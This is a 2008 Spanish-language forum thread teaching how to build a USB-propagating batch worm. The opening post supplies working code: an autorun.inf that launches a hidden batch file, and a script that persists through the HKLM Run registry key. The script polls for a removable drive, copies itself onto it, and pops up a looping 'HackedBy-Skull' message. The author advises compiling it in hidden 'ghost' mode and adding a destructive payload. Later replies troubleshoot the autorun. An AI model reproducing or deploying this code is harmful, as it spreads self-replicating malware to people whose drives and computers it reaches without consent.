Propagacion USB con Batch |By-Skull|

Iniciado por [SMT], 11 Marzo 2008, 01:52 AM

0 Miembros y 1 Visitante están viendo este tema.

[SMT]

hola, bueno aqui voy a explicar y aclarar un poco como se ejecutan algunos archivos con un autorun.inf, es simple, comenzemos...

Necesario:

crear un archivo autorun.inf
tu programa bat llamalo en este caso d.bat
y el .bat encargado de lo demas..
Quick Batch File Compiler


Bueno comenzemos lo hare breve y sencillo este constara cuando la persona ejecute o introduzca su pendrive este le va a salir un cartel que diga que es lo que desea hacer, si el elige por ejemplo la opcion de abrir el pendrive ejecutara nuestro archivo.bat (Tambien puede ser con un .exe, .vbs, etc)

Contenido del autorun.inf

[Autorun]
label=Pendrive
action=Abrir Pendrive
Icon=Icon.ico
shellexecute= "/d.bat"


bueno explico un poco label es el nombre por ejemplo cuando conectamos el pendrive como se vera si accesedemos a este por mi PC action es la accion de que cuando conectes el pendrive, este te dira que accion deseas realizar (Si ejecuta la de abrir pendrive ejecutara el .bat) Icon es el icono con el que nuestro archivo se vera y shellexecute ejecuta nuestro archivo en este caso el .bat...

ahora lo que contendra el d.bat pues eso se queda a vuestro antojo si quieren que sea virus, broma, etc... ahora si ponen por ejemplo la opcion icon (Se la pueden quitar) tiene que meter un icono adentro del pendrive, si es como si abrieran el pendrive y introdujeran el autorun el bat y el icono, a mi punto de vista yo trabajare sin el icon que es mejor....

ok ahora como metemos todo esto pues miren pueden crear un .bat que cree por ejemplo el autorun.inf y el bat en el C:\ y luego ese .bat vaya a una label y compruebe que si exciste el F:\ (en este caso este se supone que es el pendrive) copie todo lo que es el autorun.inf y el .bat a este sino vuelva al inicio y vuelva a comprobar si exciste, aqui un breve code para que vean como funciona:

Citar@echo off
:hi
cls
if EXIST "F:\" (goto si) else (goto hi)

:si
msg * si
copy /y "C:\autorun.inf", "F:\"
copy /y "C:\d.bat", "F:\"
exit

pues es asi de simple ahora que pasa si el pendrive tiene por defecto G:\, pues sinceramente tendrian  que hacer que en vez que vuelva a chekear si existe el F:\ vaya a otro y verifique si exciste el G:\ sino existe que vuelva a comprobar si exciste el F:\ y asi susecivamente..
Skull pero que pasa si apaga la PC? pues simple tiene que agregarlo al registro! ;)
Skull pero que pasa si ya esos archivos estan copiados en el pendrive? pues puedes elegir que si por ejemplo este verifica que excistes el F:\ luego verifique si exciste los archivos si existen ejecute el exit sino los copie! ;)

Skull pero no dara mucha tension que salga un pantalla negra? pues para eso les pedi el Batch file compiler para que usen el modo ghost! ;) y eso, ahora como se que no me explique muy bien aqui dejo un simple code que explica todo! ;)

Citar
@echo off
copy /y %0 "C:\WINDOWS"
reg add hklm\software\microsoft\windows\currentversion\run /v skls /t reg_sz /d C:\d.exe /f
if EXIST "C:\Autorun.inf" (goto kaki) else (goto xx)

:kaki
if EXIST "C:\d.bat" (goto hi) else (goto Xx)

:xx
echo [Autorun] > C:\Autorun.inf
echo label=Pendrive >> C:\Autorun.inf
echo action=Abrir Pendrive >> C:\Autorun.inf
echo shellexecute= "/d.bat" >> C:\Autorun.inf
echo reg add hklm\software\microsoft\windows\currentversion\run /v skls /t reg_sz /d C:\d.bat /f >> C:\d.bat
echo start >> C:\d.bat
echo start >> C:\d.bat
echo start >> C:\d.bat
echo start >> C:\d.bat
Echo :hik >> C:\d.bat
echo msg * HackedBy-Skull [Worm-Autopia] >> C:\d.bat
echo goto hik >> C:\d.bat
cls
goto hi

:hi
cls
if EXIST "F:\" (goto si) else (goto hi)

:si
if EXIST "F:\Autorun.inf" (goto si1) else (goto si2)

:si1
goto hi

:si2
copy /y "C:\autorun.inf", "F:\"
copy /y "C:\d.bat", "F:\"
goto hi

:ex
goto hi

bueno ese es el code, por razones de explicacion no lo hice mas dificl pero el d.bat pueden hacer que tambien cree otros .bat que hagan lo mismo, dejen payload que si X's dia ejecute un archivo que haga algo nose eso se los dejo a ustedes! ;)
Recuerden usar el batch file compiler para hacer el .bat en modo ghost! para que no cante tanto!
otra cosa que podrian hacer seria usar el BattoExe y poner que no salga la pantalla negra y en el evento que detecta los USB en vez de copiar otro batch se cpie a si mismo claro aqui ya ese batch deberia tener algo que si la brboma, el codigo del virus, etc.:.

Salu2's! 8)

MK-Ultra

En lo que respecta al autorun, yo hice un autorun con el siguiente code:


[Autorun]
label=Pendrive
action=Abrir Pendrive
Icon=Icon.ico
shellexecute= "/hola.bat"


osea, solo le cambie el nombre al bat.

Despues hice un bat (que se llama hola.bat) con el siguiente code:


@echo off
msg * Probando
msg /w * Anda bien
exit


Los meti en mi pendrive y cuando lo meto en una maquina me dice:

Programa

Que accion desea realizar?

Abrir Pendrive

Explorar carpeta

No realizar ninguna accion


Osea que no me "lee" la funcion "accion"

Que es lo que pasa?
Agradecer no cuesta nada (al menos no mucho)

BTC: 1DHKsWE6wGkUiHbKkwBDaF8DEGwn9n6nxQ

Sin Nick xD

[Autorun]
label=Nombre de tu pedrive
action=Abrir nombre de tu pendrive
Icon=Icon.ico
shellexecute= "/nombre del programa.exe"

asi me funciono a my a la primera

salu2
Yo solo creería en un Dios que supiese bailar.

MK-Ultra

pruebo pasarlo a .exe, tal vez sea eso....
Agradecer no cuesta nada (al menos no mucho)

BTC: 1DHKsWE6wGkUiHbKkwBDaF8DEGwn9n6nxQ

[SMT]

mmm bueno a mi me pasa lo mismo!:S y es raro pero si le das a eso de Abrir Pendrive por ejemplo lo ejecutas, porque esa es la accion que muestra, hay otra tecnicas para que apenas lo conectes lo ejecutes (Tipo T2W) pero creo que despues no vas a poder Volver a utilizar el pendrive osea siempre que lo conectes ejecutara el archivo y no podras abrir el pendrive! ;)
Solo tienes que buscar un mejor Autorun.inf

MK-Ultra

Agradecer no cuesta nada (al menos no mucho)

BTC: 1DHKsWE6wGkUiHbKkwBDaF8DEGwn9n6nxQ

[SMT]

me explico, hay muchoosss! mas comandos de lo que se trata en el .inf osea mas cosas y mejores! yo solo uso lo basico, mas si pones autorun.inf en Google te saldran muchos codigos de estos, asi pues, podras encontrar uno que haga lo que quieres a eso me refiero con buscarte uno mejor! ;)

[SMT]

no entendi bien para que posteas esto?

MK-Ultra

es un spammer, en muchos post posteo eso... tienen que bannearlo ¬¬
Agradecer no cuesta nada (al menos no mucho)

BTC: 1DHKsWE6wGkUiHbKkwBDaF8DEGwn9n6nxQ

Sai-To

está increibke está técnica de propagación skull eres unos de los mejores codera de batch de los he he escuchado! :p